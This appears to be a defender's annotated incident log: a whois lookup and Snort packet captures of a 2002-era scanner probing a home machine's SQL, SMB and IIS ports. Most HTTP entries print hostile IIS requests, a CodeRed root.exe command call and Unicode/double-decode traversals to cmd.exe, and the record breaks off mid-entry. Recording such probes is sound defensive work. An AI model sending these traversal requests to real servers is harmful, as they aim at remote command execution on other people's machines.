A ping; then probes at TCP:1433 MS SQL server, TCP:445 MS-DS (Win 2K SMB), and extensive probes at TCP:80 http which snort identified as:
WEB-IIS CodeRed v2 root.exe access,
WEB-IIS cmd.exe access,
WEB-IIS ISAPI .ida access,
WEB-IIS ISAPI .idq access,
and WEB-IIS ISAPI .printer access;
and then back for a final poke at TCP:445 before going away, 18 minutes later...
Source:
BW whois 2.9 by Bill Weinman (http://whois.bw.org/) © 1999-2001 William E. Weinman % How to use the APNIC Whois Database www.apnic.net/db/ % Upgrade to Whois v3 on 20 August 2002 www.apnic.net/whois-v3 % Whois data copyright terms www.apnic.net/db/dbcopyright.html inetnum: 210.201.100.128 - 210.201.100.255 netname: CMEF-HT-AP descr: Chen Mei Fen Co. descr: B1, No.30-20, Wen-Hua Rd., Min-Xiong Country, descr: Jia-Yi County, Taiwan, R.O.C. country: TW admin-c: MC498-AP tech-c: MC498-AP mnt-by: MAINT-TW-APOL changed: adm@ht.net.tw 20020531 source: APNIC
And the snort logs:
A ping in:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:55.953275 210.201.100.253 -> 12.82.129.120
ICMP TTL:48 TOS:0x0 ID:50988 IpLen:20 DgmLen:60
Type:8 Code:0 ID:512 Seq:58956 ECHO
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 EEEEEEEEEEEEEEEE
An echo reply out:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:55.963765 12.82.129.120 -> 210.201.100.253
ICMP TTL:255 TOS:0x0 ID:43559 IpLen:20 DgmLen:60
Type:0 Code:0 ID:512 Seq:58956 ECHO REPLY
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 EEEEEEEEEEEEEEEE
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
I did have my network data sink (ACK_hole01.c) listening on TCP:1433,
here, so he gets an ACK/SYN back, but he won't talk to me..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:56.293297 210.201.100.253:1084 -> 12.82.129.120:1433
TCP TTL:112 TOS:0x0 ID:50997 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8D6C3D77 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:56.303653 12.82.129.120:1433 -> 210.201.100.253:1084
TCP TTL:64 TOS:0x0 ID:43566 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0xB9039F17 Ack: 0x8D6C3D78 Win: 0x77C4 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:56.623292 210.201.100.253:1084 -> 12.82.129.120:1433
TCP TTL:112 TOS:0x0 ID:51007 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x8D6C3D78 Ack: 0xB9039F18 Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:56.703312 210.201.100.253:1084 -> 12.82.129.120:1433
TCP TTL:112 TOS:0x0 ID:51012 IpLen:20 DgmLen:40 DF
***A***F Seq: 0x8D6C3D78 Ack: 0xB9039F18 Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:03:56.713652 12.82.129.120:1433 -> 210.201.100.253:1084
TCP TTL:64 TOS:0x0 ID:43581 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xB9039F18 Ack: 0x8D6C3D79 Win: 0x77C4 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
I have nothing listening on TCP:445, here:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:02.713885 210.201.100.253:1110 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:51253 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8D95234E Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:05.914263 210.201.100.253:1110 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:51327 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8D95234E Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:12.484806 210.201.100.253:1110 -> 12.82.129.120:445
TCP TTL:112 TOS:0x0 ID:51594 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8D95234E Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
And I did have ACK_hole listening on TCP:80, here, and now he
gets quite chatty..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:25.616060 210.201.100.253:1248 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:52202 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8E434D61 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:25.626450 12.82.129.120:80 -> 210.201.100.253:1248
TCP TTL:64 TOS:0x0 ID:43614 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0xBB42A012 Ack: 0x8E434D62 Win: 0x77C4 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:25.946245 210.201.100.253:1248 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:52211 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x8E434D62 Ack: 0xBB42A013 Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:25.956239 210.201.100.253:1248 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:52212 IpLen:20 DgmLen:81 DF
***AP*** Seq: 0x8E434D62 Ack: 0xBB42A013 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 0D 0A P/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:25.956650 12.82.129.120:80 -> 210.201.100.253:1248
TCP TTL:64 TOS:0x0 ID:43624 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xBB42A013 Ack: 0x8E434D8B Win: 0x77C4 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:47.818256 210.201.100.253:1248 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:53056 IpLen:20 DgmLen:40 DF
***A***F Seq: 0x8E434D8B Ack: 0xBB42A013 Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:47.819713 12.82.129.120:80 -> 210.201.100.253:1248
TCP TTL:64 TOS:0x0 ID:43672 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xBB42A013 Ack: 0x8E434D8C Win: 0x77C4 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
At this point there's nothing of interest in the connection
establishements/teardowns, so I'll just snip out all but the actual
probes..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:04:48.168352 210.201.100.253:1384 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:53126 IpLen:20 DgmLen:89 DF
***AP*** Seq: 0x8EEF42F2 Ack: 0xBCBA9974 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0...
0A .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:05:10.360963 210.201.100.253:1488 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:53959 IpLen:20 DgmLen:89 DF
***AP*** Seq: 0x8F820999 Ack: 0xBF0E91C7 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0...
0A .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:05:32.572577 210.201.100.253:1611 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:54892 IpLen:20 DgmLen:123 DF
***AP*** Seq: 0x9023A6DA Ack: 0xC0389119 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
25 63 2E 2E 32 66 2E 2E 25 63 2E 2E 2F 77 69 6E %c..2f..%c../win
6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E nt/system32/cmd.
65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F exe?/c+dir .exe?
2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D /c+dir HTTP/1.0.
0A 0D 0A ...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:05:54.804890 210.201.100.253:1736 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:55882 IpLen:20 DgmLen:123 DF
***AP*** Seq: 0x90CB6B27 Ack: 0xC0F18EE2 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
25 63 2E 2E 61 66 2E 2E 25 63 2E 2E 2F 77 69 6E %c..af..%c../win
6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E nt/system32/cmd.
65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F exe?/c+dir .exe?
2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D /c+dir HTTP/1.0.
0A 0D 0A ...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:06:17.006910 210.201.100.253:1873 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:56924 IpLen:20 DgmLen:123 DF
***AP*** Seq: 0x91787A93 Ack: 0xC321B20B Win: 0x4470 TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
25 63 2E 2E 31 63 2E 2E 25 63 2E 2E 2F 77 69 6E %c..1c..%c../win
6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E nt/system32/cmd.
65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F exe?/c+dir .exe?
2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D /c+dir HTTP/1.0.
0A 0D 0A ...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:06:39.209012 210.201.100.253:1988 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:57913 IpLen:20 DgmLen:123 DF
***AP*** Seq: 0x92146341 Ack: 0xC434B5EA Win: 0x4470 TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
25 63 2E 2E 39 63 2E 2E 25 63 2E 2E 2F 77 69 6E %c..9c..%c../win
6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E nt/system32/cmd.
65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F exe?/c+dir .exe?
2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D /c+dir HTTP/1.0.
0A 0D 0A ...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:07:01.391112 210.201.100.253:2095 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:59036 IpLen:20 DgmLen:122 DF
***AP*** Seq: 0x92AC6771 Ack: 0xC542B851 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 2E 2E 25 GET /cgi-bin/..%
63 2E 2E 32 66 2E 2E 25 63 2E 2E 2F 77 69 6E 6E c..2f..%c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F xe?/c+dir .exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
0D 0A ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:07:23.573262 210.201.100.253:2189 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:60293 IpLen:20 DgmLen:122 DF
***AP*** Seq: 0x933952EB Ack: 0xC69F8B8B Win: 0x4470 TcpLen: 20
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 2E 2E 25 GET /cgi-bin/..%
63 2E 2E 61 66 2E 2E 25 63 2E 2E 2F 77 69 6E 6E c..af..%c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F xe?/c+dir .exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
0D 0A ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:07:45.775437 210.201.100.253:2306 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:61034 IpLen:20 DgmLen:122 DF
***AP*** Seq: 0x93D952B1 Ack: 0xC8680EE7 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 2E 2E 25 GET /cgi-bin/..%
63 2E 2E 31 63 2E 2E 25 63 2E 2E 2F 77 69 6E 6E c..1c..%c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F xe?/c+dir .exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
0D 0A ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:08:07.987558 210.201.100.253:2411 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:61932 IpLen:20 DgmLen:122 DF
***AP*** Seq: 0x946CBC04 Ack: 0xC93F6CD0 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 2E 2E 25 GET /cgi-bin/..%
63 2E 2E 39 63 2E 2E 25 63 2E 2E 2F 77 69 6E 6E c..9c..%c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F xe?/c+dir .exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
0D 0A ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:08:30.169690 210.201.100.253:2510 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:62794 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x95021EC8 Ack: 0xCABD7337 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 63 2E GET /msadc/..%c.
2E 32 66 2E 2E 25 63 2E 2E 2F 77 69 6E 6E 74 2F .2f..%c../winnt/
73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe
3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B ?/c+dir .exe?/c+
64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:08:52.351825 210.201.100.253:2616 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:63582 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x95954084 Ack: 0xCBD031F2 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 63 2E GET /msadc/..%c.
2E 61 66 2E 2E 25 63 2E 2E 2F 77 69 6E 6E 74 2F .af..%c../winnt/
73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe
3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B ?/c+dir .exe?/c+
64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:09:14.544100 210.201.100.253:2737 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:64453 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x96398D1D Ack: 0xCD45A004 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 63 2E GET /msadc/..%c.
2E 31 63 2E 2E 25 63 2E 2E 2F 77 69 6E 6E 74 2F .1c..%c../winnt/
73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe
3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B ?/c+dir .exe?/c+
64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:09:36.736186 210.201.100.253:2843 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:65386 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x96D006A2 Ack: 0xCE265E65 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 63 2E GET /msadc/..%c.
2E 39 63 2E 2E 25 63 2E 2E 2F 77 69 6E 6E 74 2F .9c..%c../winnt/
73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe
3F 2F 63 2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B ?/c+dir .exe?/c+
64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:09:58.938439 210.201.100.253:2964 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:837 IpLen:20 DgmLen:124 DF
***AP*** Seq: 0x97755390 Ack: 0xCFBB758D Win: 0x4470 TcpLen: 20
47 45 54 20 2F 52 70 63 2F 2E 2E 25 63 2E 2E 2F GET /Rpc/..%c../
2E 2E 2E 2F 2E 2E 2F 2E 2E 25 32 2E 2E 2F 77 69 .../../..%2../wi
6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 nnt/system32/cmd
2E 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 .exe?/c+dir .exe
3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 ?/c+dir HTTP/1.0
0D 0A 0D 0A ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:10:21.130561 210.201.100.253:3063 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:1701 IpLen:20 DgmLen:124 DF
***AP*** Seq: 0x9805CE80 Ack: 0xD25E43F9 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 52 70 63 2F 2E 2E 25 63 2E 2E 2F GET /Rpc/..%c../
2E 2E 2E 2F 2E 2E 2F 2E 2E 25 61 2E 2E 2F 77 69 .../../..%a../wi
6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 nnt/system32/cmd
2E 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 .exe?/c+dir .exe
3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 ?/c+dir HTTP/1.0
0D 0A 0D 0A ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:10:43.342744 210.201.100.253:3176 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:2716 IpLen:20 DgmLen:124 DF
***AP*** Seq: 0x98A68BA8 Ack: 0xD3B34704 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 52 70 63 2F 2E 2E 25 63 2E 2E 2F GET /Rpc/..%c../
2E 2E 2E 2F 2E 2E 2F 2E 2E 25 31 2E 2E 2F 77 69 .../../..%1../wi
6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 nnt/system32/cmd
2E 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 .exe?/c+dir .exe
3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 ?/c+dir HTTP/1.0
0D 0A 0D 0A ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:11:05.534921 210.201.100.253:3284 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:3602 IpLen:20 DgmLen:124 DF
***AP*** Seq: 0x993E52FD Ack: 0xD55034D2 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 52 70 63 2F 2E 2E 25 63 2E 2E 2F GET /Rpc/..%c../
2E 2E 2E 2F 2E 2E 2F 2E 2E 25 39 2E 2E 2F 77 69 .../../..%9../wi
6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 nnt/system32/cmd
2E 65 78 65 3F 2F 63 2B 64 69 72 20 2E 65 78 65 .exe?/c+dir .exe
3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 ?/c+dir HTTP/1.0
0D 0A 0D 0A ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:11:27.737151 210.201.100.253:3387 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:4446 IpLen:20 DgmLen:130 DF
***AP*** Seq: 0x99D44973 Ack: 0xD5C8D541 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
63 2E 2E 32 66 2E 2E 25 63 2E 2E 32 66 2E 2E 2F c..2f..%c..2f../
77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2F 63 md.exe?/c+dir /c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 md.exe?/c+dir HT
54 50 2F 31 2E 30 0D 0A 0D 0A TP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:11:49.919387 210.201.100.253:3493 -> 12.82.129.120:80
